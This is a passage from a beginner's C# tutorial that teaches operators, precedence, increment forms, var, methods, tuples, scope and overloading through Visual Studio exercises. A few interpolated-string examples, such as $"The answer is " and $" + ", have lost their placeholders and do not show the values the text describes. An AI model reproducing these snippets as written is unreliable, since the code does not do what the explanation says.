in the upper-right corner of the Document Outline window.)
3. On the form, click the two TextBox controls into which the user types
numbers. In the Document Outline window, verify that they are named
lhsOperand and rhsOperand.
When the form runs, the Text property of each of these controls holds
the values that the user enters.
4. Toward the bottom of the form, verify that the TextBlock control used to
display the expression being evaluated is named expression and that the
TextBlock control used to display the result of the calculation is named
result.
5. Close the Document Outline window.
6. On the View menu, click Code to display the code for the
MainPage.xaml.cs file in the Code and Text Editor window.
7. In the Code and Text Editor window, locate the addValues method. It
looks like this:
private void addValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Add rhs to lhs and store the result in outcome
expression.Text = $"{lhsOperand.Text} + {rhsOperand.Text}";
result.Text = outcome.ToString();
}
The first statement in this method declares an int variable called lhs and
initializes it with the integer corresponding to the value typed by the
user in the lhsOperand box. Remember that the Text property of a
TextBox control contains a string, but lhs is an int, so you must convert
this string to an integer before you can assign it to lhs. The int data type
provides the int.Parse method, which does precisely this.
The second statement declares an int variable called rhs and initializes it
to the value in the rhsOperand box after converting it to an int.
The third statement declares an int variable called outcome.
A comment stating that you need to add rhs to lhs and store the result in
outcome follows. This is the missing bit of code that you need to
implement, which you will do in the next step.
The fifth statement uses string interpolation to construct a string that
indicates the calculation being performed and assigns the result to the
expression.Text property. This causes the string to appear in the
Expression box on the form.
The final statement displays the result of the calculation by assigning it
to the Text property of the Result box. Remember that the Text property
is a string, and the result of the calculation is an int, so you must convert
the int to a string before assigning it to the Text property. Recall that this
is what the ToString method of the int type does.
8. Below the comment in the middle of the addValues method, add the
following statement (shown below in bold):
private void addValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Add rhs to lhs and store the result in outcome
outcome = lhs + rhs;
expression.Text = $"{lhsOperand.Text} + {rhsOperand.Text}";
result.Text = outcome.ToString();
}
This statement evaluates the expression lhs + rhs and stores the result in
outcome.
9. Examine the subtractValues method. You should see that it follows a
similar pattern. Here you need to add the statement to calculate the result
of subtracting rhs from lhs and store it in outcome. Add the following
statement (in bold) to this method:
private void subtractValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Subtract rhs from lhs and store the result in outcome
outcome = lhs - rhs;
expression.Text = $"{lhsOperand.Text} - {rhsOperand.Text}";
result.Text = outcome.ToString();
}
10. Examine the multiplyValues, divideValues, and remainderValues
methods. Again, they are all missing the crucial statement that performs
the specified calculation. Add the appropriate statements to these
methods (shown in bold).
private void multiplyValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Multiply lhs by rhs and store the result in outcome
outcome = lhs * rhs;
expression.Text = $"{lhsOperand.Text} * {rhsOperand.Text}";
result.Text = outcome.ToString();
}
private void divideValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Divide lhs by rhs and store the result in outcome
outcome = lhs / rhs;
expression.Text = $"{lhsOperand.Text} / {rhsOperand.Text}";
result.Text = outcome.ToString();
}
private void remainderValues()
{
int lhs = int.Parse(lhsOperand.Text);
int rhs = int.Parse(rhsOperand.Text);
int outcome = 0;
// TODO: Work out the remainder after dividing lhs by rhs and store the result in outcome
outcome = lhs % rhs;
expression.Text = $"{lhsOperand.Text} % {rhsOperand.Text}";
result.Text = outcome.ToString();
}
Test the MathsOperators application
1. On the Debug menu, click Start Debugging to build and run the
application.
2. Type 54 in the Left Operand box, type 13 in the Right Operand box,
click the + Addition option and then click Calculate.
3. The value 67 should appear in the Result box.
4. Click the – Subtraction option, and then click Calculate. Verify that the
result is now 41.
5. Click the * Multiplication option, and then click Calculate. Verify that
the result is now 702.
6. Click the / Division option, and then click Calculate. Verify that the
result is now 4.
In real life, 54/13 is 4.153846 recurring, but this is not real life; this is
C# performing integer division. When you divide one integer by another
integer, the answer you get back is an integer, as explained earlier.
7. Click the % Remainder option, and then click Calculate. Verify that the
result is now 2.
When dealing with integers, the remainder after dividing 54 by 13 is 2;
(54 – ((54/13) * 13)) is 2. This is because the calculation rounds down to
an integer at each stage. (My high school math teacher would be
horrified to be told that (54/13) * 13 does not equal 54!)
8. Return to Visual Studio and stop debugging.
Controlling precedence
Precedence governs the order in which an expression’s operators are
evaluated. Consider the following expression, which uses the + and *
operators:
2 + 3 * 4
This expression is potentially ambiguous: Do you perform the addition
first or the multiplication? The order of the operations matters because it
changes the result:
If you perform the addition first, followed by the multiplication, the
result of the addition (2 + 3) forms the left operand of the * operator,
and the result of the whole expression is 5 * 4, which is 20.
If you perform the multiplication first, followed by the addition, the
result of the multiplication (3 * 4) forms the right operand of the +
operator, and the result of the whole expression is 2 + 12, which is 14.
In C#, the multiplicative operators (*, /, and %) have precedence over the
additive operators (+ and –), so in expressions such as 2 + 3 * 4, the
multiplication is performed first, followed by the addition. The answer to 2 +
3 * 4 is therefore 14.
You can use parentheses to override precedence and force operands to
bind to operators in a different way. For example, in the following
expression, the parentheses force the 2 and the 3 to bind to the + operator
(making 5), and the result of this addition forms the left operand of the *
operator to produce the value 20:
(2 + 3) * 4
Note The term parentheses or round brackets refers to (). The term
braces or curly brackets refers to { }. The term square brackets refers to
[ ].
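You can verify these precedence rules with a couple of statements:

Console.WriteLine(2 + 3 * 4);    // multiplication is performed first: writes 14
Console.WriteLine((2 + 3) * 4);  // parentheses override precedence: writes 20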
Using associativity to evaluate expressions
Operator precedence is only half the story. What happens when an expression
contains different operators that have the same precedence? This is where
associativity becomes important. Associativity is the direction (left or right)
in which the operands of an operator are evaluated. Consider the following
expression that uses the / and * operators:
4 / 2 * 6
At first glance, this expression is potentially ambiguous. Do you perform
the division first or the multiplication? The precedence of both operators is
the same (they are both multiplicatives), but the order in which the operators
in the expression are applied is important because you can get two different
results:
If you perform the division first, the result of the division (4/2) forms
the left operand of the * operator, and the result of the whole
expression is (4/2) * 6, or 12.
If you perform the multiplication first, the result of the multiplication
(2 * 6) forms the right operand of the / operator, and the result of the
whole expression is 4/(2 * 6), or 4/12.
In this case, the associativity of the operators determines how the
expression is evaluated. The * and / operators are both left associative, which
means that the operands are evaluated from left to right. In this case, 4/2 will
be evaluated before multiplying by 6, giving the result 12.
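A single statement confirms this behavior:

Console.WriteLine(4 / 2 * 6);  // evaluated left to right as (4 / 2) * 6: writes 12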
Associativity and the assignment operator
In C#, the equal sign (=) is an operator. All operators return a value based on
their operands. The assignment operator = is no different. It takes two
operands: the operand on the right side is evaluated and then stored in the
operand on the left side. The value of the assignment operator is the value
that was assigned to the left operand. For example, in the following
assignment statement, the value returned by the assignment operator is 10,
which is also the value assigned to the variable myInt:
int myInt;
myInt = 10; // value of assignment expression is 10
At this point, you might be thinking that this is all very nice and esoteric,
but so what? Well, because the assignment operator returns a value, you can
use this same value with another occurrence of the assignment statement, like
this:
int myInt;
int myInt2;
myInt2 = myInt = 10;
The value assigned to the variable myInt2 is the value that was assigned to
myInt. The assignment statement assigns the same value to both variables.
This technique is useful if you want to initialize several variables to the same
value. It makes it very clear to anyone reading your code that all the variables
must have the same value:
myInt5 = myInt4 = myInt3 = myInt2 = myInt = 10;
From this discussion, you can probably deduce that the assignment
operator associates from right to left. The right-most assignment occurs first,
and the value assigned propagates through the variables from right to left. If
any of the variables previously had a value, it is overwritten by the value
being assigned.
You should treat this construct with caution, however. One frequent
mistake that new C# programmers make is to try to combine this use of the
assignment operator with variable declarations. For example, you might
expect the following code to create and initialize three variables with the
same value (10):
int myInt, myInt2, myInt3 = 10;
This is legal C# code (because it compiles). What it does is declare the
variables myInt, myInt2, and myInt3 and initialize myInt3 with the value 10.
However, it does not initialize myInt or myInt2. If you try to use myInt or
myInt2 in an expression such as
myInt3 = myInt / myInt2;
the compiler generates the following errors:
Use of unassigned local variable 'myInt'
Use of unassigned local variable 'myInt2'
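If you genuinely want to declare and initialize several variables in a single statement, you must initialize each variable explicitly, as in this sketch:

int myInt = 10, myInt2 = 10, myInt3 = 10;  // all three variables are initialized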
Incrementing and decrementing variables
If you want to add 1 to a variable, you can use the + operator, as
demonstrated here:
count = count + 1;
However, adding 1 to a variable is so common that C# provides its own
operator just for this purpose: the ++ operator. To increment the variable
count by 1, you can write the following statement:
count++;
Similarly, C# provides the -- operator that you can use to subtract 1 from a
variable, like this:
count--;
The ++ and -- operators are unary operators, meaning that they take only a
single operand. They share the same precedence and are both left associative.
Prefix and postfix
The increment (++) and decrement (--) operators are unusual in that you can
place them either before or after the variable. Placing the operator symbol
before the variable is called the prefix form of the operator, and using the
operator symbol after the variable is called the postfix form. Here are
examples:
count++; // postfix increment
++count; // prefix increment
count--; // postfix decrement
--count; // prefix decrement
Whether you use the prefix or postfix form of the ++ or -- operator makes
no difference to the variable being incremented or decremented. For example,
if you write count++, the value of count increases by 1, and if you write
++count, the value of count also increases by 1. Knowing this, you’re
probably wondering why there are two ways to write the same thing. To
understand the answer, you must remember that ++ and -- are operators and
that all operators are used to evaluate an expression that has a value. The
value returned by count++ is the value of count before the increment takes
place, whereas the value returned by ++count is the value of count after the
increment takes place. Here is an example:
int x;
x = 42;
Console.WriteLine(x++); // x is now 43, 42 written out
x = 42;
Console.WriteLine(++x); // x is now 43, 43 written out
The way to remember which form does what is to look at the order of
the elements (the operand and the operator) in a prefix or postfix expression.
In the expression x++, the variable x occurs first, so its value is used as the
value of the expression before x is incremented. In the expression ++x, the
operator occurs first, so its operation is performed before the value of x is
evaluated as the result.
These operators are most commonly used in while and do statements,
which are presented in Chapter 5, “Using compound assignment and iteration
statements.” If you are using the increment and decrement operators in
isolation, stick to the postfix form and be consistent.
Declaring implicitly typed local variables
Earlier in this chapter, you saw that you declare a variable by specifying a
data type and an identifier, like this:
int myInt;
It was also mentioned that you should assign a value to a variable before
you attempt to use it. You can declare and initialize a variable in the same
statement, such as illustrated in the following:
int myInt = 99;
Or, you can even do it like this, assuming that myOtherInt is an initialized
integer variable:
int myInt = myOtherInt * 99;
Now, remember that the value you assign to a variable must be of the
same type as the variable. For example, you can assign an int value only to an
int variable. The C# compiler can quickly work out the type of an expression
used to initialize a variable and indicate whether it does not match the type of
the variable. You can also ask the C# compiler to infer the type of a variable
from an expression and use this type when declaring the variable by using the
var keyword in place of the type, as demonstrated here:
var myVariable = 99;
var myOtherVariable = "Hello";
The variables myVariable and myOtherVariable are referred to as
implicitly typed variables. The var keyword causes the compiler to deduce the
type of the variables from the types of the expressions used to initialize them.
In these examples, myVariable is an int, and myOtherVariable is a string.
However, it is important for you to understand that this is a convenience for
declaring variables only. After a variable has been declared, you can assign
only values of the inferred type to it. For example, you cannot assign float,
double, or string values to myVariable at a later point in your program. You
should also understand that you can use the var keyword only when you
supply an expression to initialize a variable. The following declaration is
illegal and causes a compilation error:
var yetAnotherVariable; // Error - compiler cannot infer type
Important If you have programmed with Visual Basic in the past, you
might be familiar with the Variant type, which you can use to store any
type of value in a variable. I emphasize here and now that you should
forget everything you ever learned when programming with Visual
Basic about Variant variables. Although the keywords look similar, var
and Variant mean totally different things. When you declare a variable
in C# by using the var keyword, the type of values that you assign to the
variable cannot change from that used to initialize the variable.
If you are a purist, you are probably gritting your teeth at this point and
wondering why on earth the designers of a neat language such as C# should
allow a feature such as var to creep in. After all, it sounds like an excuse for
extreme laziness on the part of programmers and can make it more difficult to
understand what a program is doing or track down bugs (and it can even
easily introduce new bugs into your code). However, trust me that var has a
very valid place in C#, as you will see when you work through many of the
following chapters. For the time being, though, we will stick to using
explicitly typed variables except when implicit typing becomes a
necessity.
Summary
In this chapter, you saw how to create and use variables and learned about
some of the common data types available for variables in C#. You also
learned about identifiers. Also, you used a number of operators to build
expressions, and you learned how the precedence and associativity of
operators determine how expressions are evaluated.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 3.
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To | Do this
Declare a variable | Write the name of the data type, followed by the name of the variable, followed by a semicolon. For example: int outcome;
Declare a variable and give it an initial value | Write the name of the data type, followed by the name of the variable, followed by the assignment operator and the initial value. Finish with a semicolon. For example: int outcome = 99;
Change the value of a variable | Write the name of the variable on the left, followed by the assignment operator, followed by the expression calculating the new value, followed by a semicolon. For example: outcome = 42;
Generate a string representation of the value in a variable | Call the ToString method of the variable. For example: int intVar = 42; string stringVar = intVar.ToString();
Convert a string to an int | Call the System.Int32.Parse method. For example: string stringVar = "42"; int intVar = System.Int32.Parse(stringVar);
Override the precedence of an operator | Use parentheses in the expression to force the order of evaluation. For example: (3 + 4) * 5
Assign the same value to several variables | Use an assignment statement that lists all the variables. For example: myInt4 = myInt3 = myInt2 = myInt = 10;
Increment or decrement a variable | Use the ++ or -- operator. For example: count++;
CHAPTER 3
Writing methods and applying
scope
After completing this chapter, you will be able to:
Declare and call methods.
Pass information to a method.
Return information from a method.
Define local and class scope.
Use the integrated debugger to step into and out of methods as they
run.
In Chapter 2, “Working with variables, operators, and expressions,” you
learned how to declare variables, how to create expressions using operators,
and how precedence and associativity control the way in which expressions
containing multiple operators are evaluated. In this chapter, you’ll learn about
methods. You’ll see how to declare and call methods, how to use arguments
and parameters to pass information to a method, and how to return
information from a method by using a return statement. You’ll also see how
to step into and out of methods by using the Microsoft Visual Studio 2017
integrated debugger. This information is useful when you need to trace the
execution of your methods because they do not work quite as you expect.
Finally, you’ll learn how to declare methods that take optional parameters
and how to invoke methods by using named arguments.
Creating methods
A method is a named sequence of statements. If you have previously
programmed by using a language such as C, C++, or Microsoft Visual Basic,
you will see that a method is similar to a function or a subroutine. A method
has a name and a body. The method name should be a meaningful identifier
that indicates the overall purpose of the method (calculateIncomeTax, for
example). The method body contains the actual statements to be run when the
method is called. Additionally, methods can be given some data for
processing and can return information, which is usually the result of the
processing. Methods are a fundamental and powerful mechanism.
Declaring a method
The syntax for declaring a C# method is as follows:
returnType methodName ( parameterList )
{
// method body statements go here
}
The following is a description of the elements that make up a declaration:
The returnType is the name of a type and specifies the kind of
information the method returns as a result of its processing. This can be
any type, such as int or string. If you’re writing a method that does not
return a value, you must use the keyword void in place of the return
type.
The methodName is the name used to call the method. Method names
follow the same identifier rules as variable names. For example,
addValues is a valid method name, whereas add$Values is not. For
now, you should follow the camelCase convention for method names;
for example, displayCustomer.
The parameterList is optional and describes the types and names of the
information that you can pass into the method for it to process. You
write the parameters between opening and closing parentheses, ( ), as
though you’re declaring variables, with the name of the type followed
by the name of the parameter. If the method you’re writing has two or
more parameters, you must separate them with commas.
The method body statements are the lines of code that are run when the
method is called. They are enclosed between opening and closing
braces, { }.
Important If you program in C, C++, and Visual Basic, you should
note that C# does not support global methods. You must write all your
methods inside a class; otherwise, your code will not compile.
Here’s the definition of a method called addValues that returns an int
result and has two int parameters, leftHandSide and rightHandSide:
int addValues(int leftHandSide, int rightHandSide)
{
// ...
// method body statements go here
// ...
}
Note You must explicitly specify the types of any parameters and the
return type of a method. You cannot use the var keyword.
Here’s the definition of a method called showResult that does not return a
value and has a single int parameter called answer:
void showResult(int answer)
{
// ...
}
Notice the use of the keyword void to indicate that the method does not
return anything.
Important If you’re familiar with Visual Basic, notice that C# does not
use different keywords to distinguish between a method that returns a
value (a function) and a method that does not return a value (a
procedure or subroutine). You must always specify either a return type
or void.
Returning data from a method
If you want a method to return information (that is, its return type is not
void), you must include a return statement at the end of the processing in the
method body. A return statement consists of the keyword return followed by
an expression that specifies the returned value and a semicolon. The type of
the expression must be the same as the type specified by the method
declaration. For example, if a method returns an int, the return statement
must return an int; otherwise, your program will not compile. Here is an
example of a method with a return statement:
int addValues(int leftHandSide, int rightHandSide)
{
// ...
return leftHandSide + rightHandSide;
}
The return statement is usually positioned at the end of the method
because it causes the method to finish, and control returns to the statement
that called the method, as described later in this chapter. Any statements that
occur after the return statement are not executed (although the compiler
warns you about this problem if you place statements after the return
statement).
If you don’t want your method to return information (that is, its return
type is void), you can use a variation of the return statement to cause an
immediate exit from the method. You write the keyword return and follow it
immediately with a semicolon. For example:
void showResult(int answer)
{
// display the answer
Console.WriteLine($"The answer is ");
return;
}
If your method does not return anything, you can also omit the return
statement because the method finishes automatically when execution arrives
at the closing brace at the end of the method. Although this practice is
common, it is not always considered good style.
Using expression-bodied methods
Some methods can be very simple, performing a single task or returning the
results of a calculation without involving any additional logic. C# supports a
simplified form for methods that comprise a single expression. These
methods can still take parameters and return values, and they operate in the
same way as the methods that you have seen so far. The following code
examples show simplified versions of the addValues and showResult methods
written as expression-bodied methods:
int addValues(int leftHandSide, int rightHandSide) => leftHandSide +
rightHandSide;
void showResult(int answer) => Console.WriteLine($"The answer is {answer}");
The main differences are the use of the => operator to reference the
expression that forms the body of the method and the absence of a return
statement. The value of the expression is used as the return value; if the
expression does not return a value, then the method is void.
There is actually no difference in functionality between using an ordinary
method and an expression-bodied method; an expression-bodied method is
merely a syntactic convenience. However, you will see examples later in the
book where expression-bodied methods can clarify a program by removing
lots of extraneous { and } characters, making the code easier to read.
In the following exercise, you will examine another version of the
MathsOperators project from Chapter 2. This version has been improved by
the careful use of some small methods. Dividing code in this way helps to
make it easier to understand and more maintainable.
Examine method definitions
1. Start Visual Studio 2017, if it is not already running.
2. Open the Methods solution, which is in the \Microsoft
Press\VCSBS\Chapter 3\Methods folder in your Documents folder.
3. On the Debug menu, click Start Debugging.
4. Visual Studio 2017 builds and runs the application. It should look the
same as the application from Chapter 2. Refamiliarize yourself with the
application and how it works and then return to Visual Studio. On the
Debug menu, click Stop Debugging.
5. Display the code for MainPage.xaml.cs in the Code and Text Editor
window (in Solution Explorer, expand the MainPage.xaml file and then
double-click MainPage.xaml.cs).
6. In the Code and Text Editor window, locate the addValues method,
which looks like this:
private int addValues(int leftHandSide, int rightHandSide)
{
expression.Text = $" + ";
return leftHandSide + rightHandSide;
}
Note For the moment, don’t worry about the private keyword at
the start of the definition of this method; you will learn what this
keyword means in Chapter 7, “Creating and managing classes and
objects.”
The addValues method contains two statements. The first statement
displays the calculation being performed in the expression box on the
form.
The second statement uses the int version of the + operator to add the
values of the leftHandSide and rightHandSide int variables, and then
returns the result of this operation. Remember that adding two int values
together creates another int value, so the return type of the addValues
method is int.
If you look at the methods subtractValues, multiplyValues, divideValues,
and remainderValues, you will see that they follow a similar pattern.
7. In the Code and Text Editor window, locate the showResult method,
which looks like this:
private void showResult(int answer) =>
result.Text = answer.ToString();
This is an expression-bodied method that displays a string representation
of the answer parameter in the result box. It does not return a value, so
the type of this method is void.
Tip There is no minimum length for a method. If a method helps to
avoid repetition and makes your program easier to understand, the
method is useful regardless of how small it is.
There is also no maximum length for a method, but usually, you
want to keep your method code small enough to get the job done. If
your method is more than one screen in length, consider breaking it into
smaller methods for readability.
Calling methods
Methods exist to be called! You call a method by name to ask it to perform
its task. If the method requires information (as specified by its parameters),
you must supply the information requested. If the method returns information
(as specified by its return type), you should arrange to capture this
information somehow.
Specifying the method call syntax
The syntax of a C# method call is as follows:
result = methodName ( argumentList )
The following is a description of the elements that make up a method call:
The methodName must exactly match the name of the method you’re
calling. Remember, C# is a case-sensitive language.
The result = clause is optional. If specified, the variable identified by
result contains the value returned by the method. If the method is void
(that is, it does not return a value), you must omit the result = clause of
the statement. If you don’t specify the result = clause and the method
does return a value, the method runs, but the return value is discarded.
The argumentList supplies the information that the method accepts.
You must supply an argument for each parameter, and the value of
each argument must be compatible with the type of its corresponding
parameter. If the method you’re calling has two or more parameters,
you must separate the arguments with commas.
Important You must include the parentheses in every method call,
even when calling a method that has no arguments.
To clarify these points, take a look at the addValues method again:
int addValues(int leftHandSide, int rightHandSide)
{
// ...
}
The addValues method has two int parameters, so you must call it with
two comma-separated int arguments, such as this:
addValues(39, 3); // okay
You can also replace the literal values 39 and 3 with the names of int
variables. The values in those variables are then passed to the method as its
arguments, like this:
int arg1 = 99;
int arg2 = 1;
addValues(arg1, arg2);
If you try to call addValues in some other way, you will probably not
succeed for the reasons described in the following examples:
addValues; // compile-time error, no parentheses
addValues(); // compile-time error, not enough arguments
addValues(39); // compile-time error, not enough arguments
addValues("39", "3"); // compile-time error, wrong types for
arguments
The addValues method returns an int value. You can use this int value
wherever an int value can be used. Consider these examples:
int result = addValues(39, 3);  // on right-hand side of an assignment
showResult(addValues(39, 3));   // as argument to another method call
The following exercise continues with the Methods application. This time,
you will examine some method calls.
Examine method calls
1. Return to the Methods project. (This project is already open in Visual
Studio 2017 if you’re continuing from the previous exercise. If you are
not, open it from the \Microsoft Press\VCSBS\Chapter 3\Methods
folder in your Documents folder.)
2. Display the code for MainPage.xaml.cs in the Code and Text Editor
window.
3. Locate the calculateClick method, and look at the first two statements of
this method after the try statement and opening brace. (You will learn
about try statements in Chapter 6, “Managing errors and exceptions.”)
These statements look like this:
int leftHandSide = System.Int32.Parse(lhsOperand.Text);
int rightHandSide = System.Int32.Parse(rhsOperand.Text);
These two statements declare two int variables, called leftHandSide and
rightHandSide. Notice the way in which the variables are initialized. In
both cases, the Parse method of the System.Int32 struct is called.
(System is a namespace, and Int32 is the name of the struct in this
namespace. You will learn about structs in Chapter 9, “Creating value
types with enumerations and structures.”) You have seen this method
before; it takes a single string parameter and converts it to an int value.
These two lines of code take what the user has typed into the
lhsOperand and rhsOperand text box controls on the form and convert
it to int values.
4. Look at the fourth statement in the calculateClick method (after the if
statement and another opening brace):
calculatedValue = addValues(leftHandSide, rightHandSide);
This statement calls the addValues method, passing the values of the
leftHandSide and rightHandSide variables as its arguments. The value
returned by the addValues method is stored in the calculatedValue
variable.
5. Look at the next statement:
showResult(calculatedValue);
This statement calls the showResult method, passing the value in the
calculatedValue variable as its argument. The showResult method does
not return a value.
6. In the Code and Text Editor window, find the showResult method you
looked at earlier.
The only statement of this method is this:
result.Text = answer.ToString();
Notice that the ToString method call uses parentheses even though there
are no arguments.
Tip You can call methods belonging to other objects by prefixing the
method with the name of the object. In the preceding example, the
expression answer.ToString() calls the method named ToString
belonging to the object called answer.
Returning multiple values from a method
There may be occasions when you want to return more than one value from a
method. For example, in the Methods project, you might want to combine the
effects of the divideValues and remainderValues operations into a single
method that returns the result of dividing the two operands, together with the
remainder. You can achieve this by returning a tuple.
A tuple is simply a small collection of values (strictly speaking, a tuple
contains two values, but C# tuples can comprise bigger sets than this). You
indicate that a method returns a tuple by specifying a list of types as part of
the method definition; one type for each value returned. The return statement
in the method returns a list of values, as shown by the following example:
(int, int) returnMultipleValues(...)
{
int val1;
int val2;
... // Calculate values for val1 and val2
return (val1, val2);
}
When you call the method, you provide an equivalent list of variables for
holding the results:
int retVal1, retVal2;
(retVal1, retVal2) = returnMultipleValues(...);
The following exercise illustrates how to create and call a method that
returns a tuple.
Note Tuples are a work in progress and are not yet fully integrated into
the build of C# included with Visual Studio 2017. You must install an
additional package if you want to use them. The steps for doing this are
covered in the exercise.
Create and call a method that returns a tuple
1. Return to the Methods project and display the code for
MainPage.xaml.cs in the Code and Text Editor window.
2. Locate the divideValues and remainderValues methods and delete them.
3. In place of these two methods, add the following method:
private (int, int) divide(int leftHandSide, int rightHandSide)
{
}
This method returns a tuple containing two values. These values will
contain the results of dividing the leftHandSide variable by the
rightHandSide variable, and also the remainder.
4. In the body of the method, add the code shown below in bold. This code
performs the calculations and returns a tuple containing the results:
private (int, int) divide(int leftHandSide, int rightHandSide)
{
expression.Text = $"{leftHandSide} / {rightHandSide}";
int division = leftHandSide / rightHandSide;
int remainder = leftHandSide % rightHandSide;
return (division, remainder);
}
Note Visual Studio will display red squiggles under the code that
defines the tuples. If you hover over this code you will see the
message “Predefined type ‘System.ValueTuple`2’ is not defined
or imported.” This is fine. As explained before the exercise, you
have to add another package to the solution before Visual Studio
can use tuples. You will do this shortly.
5. Scroll up to the calculateClick method, and locate the following code
near the end of the method:
else if (division.IsChecked.HasValue && division.IsChecked.Value)
{
    calculatedValue = divideValues(leftHandSide, rightHandSide);
    showResult(calculatedValue);
}
else if (remainder.IsChecked.HasValue && remainder.IsChecked.Value)
{
    calculatedValue = remainderValues(leftHandSide, rightHandSide);
    showResult(calculatedValue);
}
6. Delete this code; the divideValues and remainderValues methods no
longer exist and have been replaced with the single divide method.
7. Add the following statements in place of the code you have just deleted:
else if (division.IsChecked.HasValue && division.IsChecked.Value)
{
    int division, remainder;
    (division, remainder) = divide(leftHandSide, rightHandSide);
    result.Text = $"{division} remainder {remainder}";
}
This code calls the divide method. The values returned are displayed in
the results text box.
8. In Solution Explorer, double-click the MainPage.xaml file to display the
form in the Design View window.
9. Click the % Remainder radio button, and then press Delete to remove it
from the form. This radio button is no longer required.
10. In the Tools menu above the Design View window, point to NuGet
Package Manager, and then click Manage NuGet Packages for Solution.
The NuGet package manager enables you to install additional packages
and libraries for a project. This is how you install support for tuples.
11. In the Manage Packages for Solution window, click Browse.
12. In the Search box, type ValueTuple.
13. In the list of packages that appears, click System.ValueTuple (this
should be the first item in the list).
14. In the right-hand pane, check the Project check box, and then click
Install.
15. In the Preview Changes dialog box, click OK to confirm that you want
to install the package.
16. When the package has been installed, on the Debug menu, click Start
Debugging to build and run the application.
17. In the Left Operand text box, enter 59; in the Right Operand text box,
enter 13; click Division, and then click Calculate.
18. Verify that the Result text box contains the message “4 remainder 7”.
19. Return to Visual Studio. On the Debug menu, click Stop Debugging.
Applying scope
You create variables to hold values. You can create variables at various
points in your applications. For example, the calculateClick method in the
Methods project creates an int variable called calculatedValue and assigns it
an initial value of zero, like this:
private void calculateClick(object sender, RoutedEventArgs e)
{
int calculatedValue = 0;
...
}
This variable comes into existence at the point where it is defined, and
subsequent statements in the calculateClick method can then use this
variable. This is an important point: a variable can be used only after it has
been created. When the method has finished, this variable disappears and
cannot be used elsewhere.
When a variable can be accessed at a particular location in a program, the
variable is said to be in scope at that location. The calculatedValue variable
has method scope; it can be accessed throughout the calculateClick method
but not outside that method. You can also define variables with different
scope; for example, you can define a variable outside a method but within a
class, and this variable can be accessed by any method within that class. Such
a variable is said to have class scope.
To put it another way, the scope of a variable is simply the region of the
program in which that variable is usable. Scope applies to methods as well as
variables. The scope of an identifier (of a variable or method) is linked to the
location of the declaration that introduces the identifier in the program, as
you will learn next.
Defining local scope
The opening and closing braces that form the body of a method define the
scope of the method. Any variables you declare inside the body of a method
are scoped to that method; they disappear when the method ends and can be
accessed only by code running in that method. These variables are called
local variables because they are local to the method in which they are
declared; they are not in scope in any other method.
The scope of local variables means that you cannot use them to share
information between methods. Consider this example:
class Example
{
void firstMethod()
{
int myVar;
...
}
void anotherMethod()
{
myVar = 42; // error - variable not in scope
...
}
}
This code fails to compile because anotherMethod is trying to use the
variable myVar, which is not in scope. The variable myVar is available only
to statements in firstMethod that occur after the line of code that declares
myVar.
Defining class scope
The opening and closing braces that form the body of a class define the scope
of that class. Any variables you declare within the body of a class (but not
within a method) are scoped to that class. The proper C# term for a variable
defined by a class is field. As mentioned earlier, in contrast with local
variables, you can use fields to share information between methods. Here is
an example:
class Example
{
void firstMethod()
{
myField = 42; // ok
...
}
void anotherMethod()
{
myField++; // ok
...
}
int myField = 0;
}
The variable myField is defined in the class but outside the methods
firstMethod and anotherMethod. Therefore, myField has class scope and is
available for use by all methods in that class.
There is one other point to notice about this example. In a method, you
must declare a variable before you can use it. Fields are a little different. A
method can use a field before the statement that defines the field; the
compiler sorts out the details for you.
Overloading methods
If two identifiers have the same name and are declared in the same scope,
they are said to be overloaded. Often an overloaded identifier is a bug that is
trapped as a compile-time error. For example, if you declare two local
variables with the same name in the same method, the compiler reports an
error. Similarly, if you declare two fields with the same name in the same
class or two identical methods in the same class, you also get a compile-time
error. This fact might seem hardly worth mentioning given that everything so
far has turned out to be a compile-time error. However, there is a way that
you can overload an identifier for a method that is both useful and important.
Consider the WriteLine method of the Console class. You have already
used this method for writing a string to the screen. However, when you type
WriteLine in the Code and Text Editor window when writing C# code, notice
that Microsoft IntelliSense gives you 19 different options! Each version of
the WriteLine method takes a different set of parameters. One version takes
no parameters and simply outputs a blank line. Another version takes a bool
parameter and outputs a string representation of its value (True or False). Yet
another implementation takes a decimal parameter and outputs it as a string,
and so on. At compile time, the compiler looks at the types of the arguments
you are passing in and then arranges for your application to call the version
of the method that has a matching set of parameters. Here is an example:
static void Main()
{
Console.WriteLine("The answer is ");
Console.WriteLine(42);
}
Overloading is primarily useful when you need to perform the same
operation on different data types or varying groups of information. You can
overload a method when the different implementations have different sets of
parameters; that is, when they have the same name but a different number of
parameters or when the types of the parameters differ. When you call a
method, you supply a comma-separated list of arguments, and the number
and type of the arguments are used by the compiler to select one of the
overloaded methods. However, keep in mind that although you can overload
the parameters of a method, you can’t overload the return type of a method.
In other words, you can’t declare two methods with the same name that differ
only in their return type. (The compiler is clever, but not that clever.)
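To make these rules concrete, here is a minimal sketch (the class and method names are hypothetical, not part of the Methods project) showing an overload set that compiles, together with an overload that is rejected because it differs only by return type:

class OverloadDemo
{
    // Legal overloads: same name, different parameter lists.
    void Display(int value) { /* ... */ }
    void Display(double value) { /* ... */ }
    void Display(int value, string label) { /* ... */ }

    // Illegal: differs from Display(int) only by its return type.
    // Uncommenting this declaration causes a compile-time error.
    // int Display(int value) { return value; }
}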
Writing methods
In the following exercises, you’ll create a method that calculates how much a
consultant would charge for a given number of consultancy days at a fixed
daily rate. You will start by developing the logic for the application and then
use the Generate Method Stub Wizard to help you write the methods that are
used by this logic. Next, you’ll run these methods in a console application to
get a feel for the program. Finally, you’ll use the Visual Studio 2017
debugger to step into and out of the method calls as they run.
Develop the logic for the application
1. Using Visual Studio 2017, open the DailyRate project, which is in the
\Microsoft Press\VCSBS\Chapter 3\DailyRate folder in your Documents
folder.
2. In Solution Explorer, in the DailyRate project, double-click the file
Program.cs to display the code for the program in the Code and Text
Editor window.
